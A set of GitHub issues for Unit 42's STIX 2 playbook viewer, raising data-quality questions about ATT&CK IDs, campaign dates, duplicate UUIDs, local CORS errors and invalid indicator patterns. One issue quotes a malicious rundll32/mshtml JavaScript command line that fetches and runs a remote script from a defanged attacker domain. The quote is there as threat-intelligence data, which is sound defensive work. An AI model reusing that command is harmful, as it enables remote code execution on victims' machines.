pan-unit42 / playbook_viewer Goto Github PK

I have added a new json file (stix2 format) to the playbooks folder and modified the html to show it, but nothing is displayed.

Does you playbook viewer support adding new playbooks or only the ones created by you?
As mentioned in your repo, you use att&ck framework and STIX 2, but exporting a MISP event maped to att&ck framework in stix 2 seems to not work at all.

Many thanks

As we've been building a tool to display your awesome playbook data, we've noticed that in older campaigns, the MITRE Techniques that are referenced have been deprecated. Are there any plans to go back and update them to the current Technique? One example that stands out is how Phishing was deprecated and replaced with Phishing with Link and Phishing with Attachment.

I can also see the other side of the argument for keeping the historical technique at the time it occurred, but I was just curious if it had come up in your planning. Thanks!

Saw your presentation at ATTACKCon, nice job.

I was hoping to leverage your data along with the MITRE ATTACK Data (https://github.com/mitre/cti), however, the attack pattern ID's do not match, and so we would have duplicates.

Any thought of leveraging MITRE's STIX objects?

Thanks

Hi there. I'm trying to validate that I'm using all of the information you've provided correctly in our application. The first report we've ingested is the Tick group. I see two campaigns in the data, and they match up with the specific attack patterns used for each one just like I see on the Playbook Viewer page. However, the data file names one campaign "January 2018" but on the Viewer it says, "December 2017 to January 2018". Where do those dates come from? Are you using the "first_seen" and "last_seen" dates and extrapolating?

"December 2017 to January 2018"

{
      "type": "campaign",
      "id": "campaign--be7cda7f-8a8a-4bf6-9ba3-5c713664ecdf",
      "created": "2018-07-11T20:25:11.667Z",
      "modified": "2018-07-23T17:49:05.500Z",
      "name": "January 2018",
      "description": "\nTick group targeted a specific type of secure USB drive [snip]...",
      "first_seen": "2018-01-01",
      "last_seen": "2018-01-12"
    }

"October 2016 to June 2017"

{
     "type": "campaign",
     "id": "campaign--358b5915-2a63-4406-828f-890558e27a1f",
     "created": "2018-08-03T13:20:50.755Z",
     "modified": "2018-08-06T18:11:18.234Z",
     "name": "July 2017",
     "description": " The “Tick” group has conducted cyber espionage attacks [snip]... ",
     "first_seen": "2016-11-01",
     "last_seen": "2017-07-01"
   }

I am ingesting all of your bundles as threat intelligence and I noticed that its never explicitly stated which campaigns are attributable to which intrusion sets. There isn't a relationship object that connects the two. Is this intentionally left out? Or is it something that could be added?
Thanks!

Issue:

When opening the playbook on localhost without a server, CORS policy of browser blocks loading of the resources.
The message from the browser:

Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at file:///C:/Repositories/playbook_viewer-master/consts.json. (Reason: CORS request not http).

Workaround:

Run browser with disabled CORS protection - it works
.\chrome.exe --allow-file-access-from-files

Then the playbook works normally

How can we deploy this project locally and add out own content
once downloaded there is no way directly run this project on a server

Firstly, thank you for this amazing resource, the playbooks have been very useful for my current project.

However, a lot of the new indicators in the playbooks have invalid STIX patterns. This can be verified by running the CTI Pattern Validator provided by MITRE.

For eg., indicator--8daedb2f-bc56-45eb-9eab-916e23cb957a from rancor.json has pattern [\"file:name = 'Mk3tj.doc'\"].

Inputting it in the pattern validator yields the following error:
FAIL: Error found at line 1:1. mismatched input '' expecting {IdentifierWithoutHyphen, IdentifierWithHyphen, '('}

Similarly, indicator--36ffed63-3a43-4572-950e-bbe451ae2627 from rancor.json has pattern [process:command_line = '""rundll32 javascript:\""\..\mshtml,RunHTMLApplication \"";document.write();try{GetObject(\""script:http://update.upload-dropbox[.]com/images/rtf/logo33_bak.ico\"");}catch(e){};window.close()""" & " /mo 10 /F""']

Inputting it in the pattern validator yields the following error:
FAIL: Error found at line 1:24. mismatched input ''' expecting {IntNegLiteral, IntPosLiteral, FloatNegLiteral, FloatPosLiteral, HexLiteral, BinaryLiteral, StringLiteral, BoolLiteral, TimestampLiteral}

There are invalid patterns such as this littered across the different playbooks, and this makes using the CTI Pattern Matcher very difficult for my use case as it will fail when encountering an invalid pattern.

The object attack pattern object that starts at line 1638 and ends at line 1657 seems to be a place holder object. It has no description or kill_chain_phases.

The ID of the T1060 present in MenuPass.json is attack-pattern--d586e6f2-83a6-43f1-b267-c47ab031b33e, but Mitre's is attack-pattern--9422fc14-1c43-410d-ab0f-a709b76c72dc. Would it be possible to update the id to match?

Both Sofacy.json and Reaper.json have a report with an ID of "report--054e7551-bbbe-4e7f-b923-73fb08fa00b2". Is this intentional?

This isn't really an issue so much as a question...

I know there are tools like cti-python-stix2 or cyberstationFX (https://github.com/workingDog/cyberstationFX) that allow the creation of STIX 2.0 documents but was curious what Unit 42 used to create playbooks.

Hi there, I'm curious why some IntrusionSet names are prepended with "[Playbook]" and others aren't. Examples include Muddy Water, Cobalt Gang, and Chafer. Will all of the names be normalized at some point so they all either include that string or don't? Thanks!

When reviewing the data, I noticed that some objects have the same uuid, but different type. I believe that most people are under the assumption that the UUID part of the identifier is unique among all objects, and that the type prefix is NOT required to make the identifier unique. As it is, if someone makes this assumption, they will not be able to use your data.

For example, in https://github.com/pan-unit42/playbook_viewer/blob/master/playbook_json/patchwork.json , the UUID, 4832076b-7a4c-4952-8853-6446de513176, is used for a relationship, a report and a campaign.

$grep 4832076b-7a4c-4952-8853-6446de513176 patchwork.json | grep id 
      "id": "relationship--4832076b-7a4c-4952-8853-6446de513176",
      "id": "report--4832076b-7a4c-4952-8853-6446de513176",
      "id": "campaign--4832076b-7a4c-4952-8853-6446de513176",

This happens in other playbooks as well.